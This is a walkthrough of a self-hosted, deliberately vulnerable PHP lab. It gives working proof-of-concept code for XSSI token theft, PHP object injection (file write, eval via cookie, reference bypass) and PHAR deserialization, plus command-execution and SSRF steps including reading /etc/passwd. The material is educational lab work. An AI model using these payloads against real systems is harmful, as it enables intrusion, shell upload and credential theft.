Lesser Known Web Attack(LKWA) Lab Walk-through

0x0A — Introduction

I created LKWA lab for security enthusiastic that can test varieties of lesser known web attack such as Cross-Site Script Inclusion(XSSI), PHP Object Injection(simple injection, via cookies, object reference), PHAR Deserialization, SSRF and variables variable. You can download it from here. This blog post is for only walk-through, if I have more free times I want to write about each vulnerability in more detailed.

0x01 — Blind RCE

Description

Before I talked about blind RCE, let’s talk about what is is RCE. According to Wikipedia, arbitrary code execution is used to describe an attacker’s ability to execute arbitrary commands or code on a target machine or in a target process. An arbitrary code execution vulnerability is a security flaw in software or hardware allowing arbitrary code execution.

In blind RCE, it is same as RCE but information such as error code, commands that you ran will not return to you and that’s why we(cyber security guys) called blind RCE. Now we know about what is RCE. Let’s talk about how do we detect it.

Let’s run some command such as dir because I hosted LKWA lab on Windows.

We don’t see any output and so let’s grep some source code in blind_rce.php.

In line 10, it takes user_input POST value and saves it to user_input variable and then execute user_input value. It uses exec function and didn’t echo the output, that’s why we see nothing. PHP has different functions that can execute commands.

Solution

Some function can see the output but some cannot. Below figure shows if we run ping -n 5 127.0.0.1, the page response time becomes 5741 bytes which is nearly 5 seconds and bomb blind RCE.

If we are using burp collaborator we can received some output as shown in below.

Now, we just did blind RCE lab and the rest will be yours. You can run remote shell commands or whatever you want. Next I will walk-through about XSSI challenge.

0x02 — XSSI

Description

Last 2 years ago, I want to know what is XSSI. So, I searched it on google and I found this interesting discussions. You can read more in here.

Browsers have implemented security features like SOP that prevents how a document or script loaded from one origin can interact with a resource from another origin. It helps isolate potentially malicious documents, reducing possible attack vectors. For example site A implemented example.js and site B want to read example.js from site A. That will block by SOP. But if site A used JSONP, site B can read that js file.

Due to lack of my English skill, it’s hard to understand right?. You better should read from here and here :D.

Solution

After logging in into XSSI challenge page with username admin and password password, you will see username and randomly generated token in challenge page.

Username and token is retrieved using ajax called as shown in below.

Then I followed that /api/user and JSON callback is allowed.

Boom!!!, XSSI. So, I created simple POC to steal admin token.

<html>
  <head>
    <title>XSSI</title>    
  </head>
<body>
	<script>
		function a(s)
		{
		alert(JSON.stringify(s));
		}
	</script>
	<script src="http://localhost:8081/LKWA/api/user?callback=a"></script>
</body>
</html>

Then listen the php server with

php -S localhost:9000

After browsing the url. I can get username and token.

0x03 — PHP Object Injection

Description

PHP Object Injection is a vulnerability that could allow an attacker to exploit something weird such as SQL injection, RCE because of unsafe use of unserialize() php function.

Solution

In object injection challenge page, there is a submit button. After you clicked that submit button, some serialized data is added into the url as shown in below.

Now, let’s analyse some source code.

When user is clicked the submit button, it unserialize data from object parameter then prints the output into a web page, the logic is so simple. But, there is hidden class in the source code. In line 3, the source code include a php file which is “obj_injection.php” and it contains some code.

Boom, if we can control the unserialize data, we can upload a shell to web server. Now, let’s create attack php script that can upload a shell.

<?php
class Foo{
    function __construct($filename, $data) {
        $this->filename = $filename;
        $this->data = $data;
    }
    function __destruct(){
        file_put_contents($this->filename, $this->data);
    }
}
$a = new Foo("test.php","<?php phpinfo(); ?> ");
echo serialize($a);
?>

Then run the above script.

After that copy above serialized output and replace into object parameter, then send the request.

You will see a new file test.php will be created in your server.

0x04 — PHP Object Injection(cookie)

Description

The vulnerability is same as 0x03. The only difference is that object injection occurs in cookie.

Solution

When browsing objection injection(cookie) challenge page, you will notice that it contains login box. You can login with username admin and password password. After login, some serialize data is added into cookie as shown in below.

Now let’s see the source code of content.php inside objectInjection_cookie folder.

As shown in above, if we supplied correct username and password, the username cookie value is set to serialize data string. After that, unserialize data and echo the output of username.

In order to get serialized data to normal data, unserialize function is need to use. Content.php also include object_injection.php at line number 3. So, let’s analyze object_injection.php.

As shown in above, if we can control unserialize function, we can get command execution. So, let’s write attack script.

<?php
/**
 * Object Injection via Cookie
 */
class Foo{
	public $cmd;
    function __construct() {
    }
    function __destruct(){
        eval($this->cmd);
    }
}
$a = new Foo();
$a->cmd = "phpinfo();";
echo serialize($a);
?>

This will generate,

O:3:"Foo":1:{s:3:"cmd";s:10:"phpinfo();";}

Replace the original cookie with above output and you will see phpinfo.

0x05 — PHP Object Injection(Object Reference)

Description

As php said, “A PHP reference is an alias, which allows two different variables to write to the same value. As of PHP 5, an object variable doesn’t contain the object itself as value anymore. It only contains an object identifier which allows object accessors to find the actual object. When an object is sent by argument, returned or assigned to another variable, the different variables are not aliases: they hold a copy of the identifier, which points to the same object”. You can read more about here. This vulnerability is same as 0x04 and 0x05 but most don’t know about we can reference the object that could allows an attacker to authentication bypass or …..

Solution

I already added a solution in objectref.php under objectref folder.

As shown in above, it takes our input which is guess number along with serialize data. Then it compares our guess number with randomly generated secret code. If our number matched with that secret code, it shows we win, if not we lose. It’s impossible right?. But we can bypass this and we can win the game. Let’s create some attack code that can bypass the restriction.

<?php
class Object1
{
  var $guess;
  var $secretCode;
}
$a = new Object1();
$a->guess =  &$a->secretCode;
echo serialize($a);
?>

At line 9, we referenced guess variable and secretCode variable. The above code will generate following output.

O:7:"Object1":2:{s:5:"guess";N;s:10:"secretCode";R:2;}

If you put original input value with the above output, you can win the game.

0x06 — PHAR Deserialization

Description

PHAR (PHP Archive) file is a package format to enable distribution of applications and libraries by bundling many PHP code files and other resources (e.g. images, stylesheets, etc.) into a single archive file. PHAR files may be in one of three formats: tar, and ZIP, which are compatible with their respective tooling, and a custom PHAR format. Regardless of the format used, all PHAR files use the .phar file extension.

PHP Object injection can exploit if unserialize data is not well validated. In general, object injection occurs because of unsafe use of unserialize() function. But attacker can exploit with phar file without even need unserialize() function.

If you want to know more about PHAR deserialization vuln, you can read here and here.

Solution

I already added attack payload script which is genphar.php inside phar_deserial folder.

<?php
// create new Phar
@unlink("pharfile.phar");
$phar = new Phar('pharfile.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'data');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
// add object of any class as meta data
class log
{
    function __wakeup(){
    }
}
$object = new log;
$object->filename = 'shell.php.txt';
$object->data = 'hi';
$phar->setMetadata($object);
$phar->stopBuffering();
?>

Above script will generate pharfile.file in current folder and then upload that pharfile.

In, phar_serial.php there is no use of unserialize function. But we can attack using PHAR deserialization bug.

Including phar://pharfile.phar will generate shell.php.txt in your server. You can also upload shell.

0x07 — SSRF

Description

Server-Side Request Forgery (SSRF) is a kind of bug that allows an attacker to read or update internal resources. The attacker can supply or a modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like http enabled databases or perform post requests towards internal services which are not intended to be exposed.

Solution

If we put image url, it will shows image in output as shown in below.

And also the code is so simple.

There is no restrictions in code, we can include local files like /etc/passwd.

0x08 — Variables variable

Description

A variable variable takes the value of a variable and treats that as the name of a variable. They can allow execution of arbitrary code or arbitrary functions, or read/write access of
arbitrary internal variables. For more information, you can read here.

Solution

If we submit some values in variables variable challenge page, it returns var_dump output of data as shown in below.

Let’s analyse the source code of variable.php in variables folder.

As shown in above, If GET parameter func and input contains, func’s value is added into a $var variable. Then it added into a dynamic variables, in this case ${“var”}($_GET[‘input’]). The purpose is to dump the string using var_dump function.

But we can control that dynamic function. If we changed var_dump to passthru and input to dir, boom!!! we will get command execution.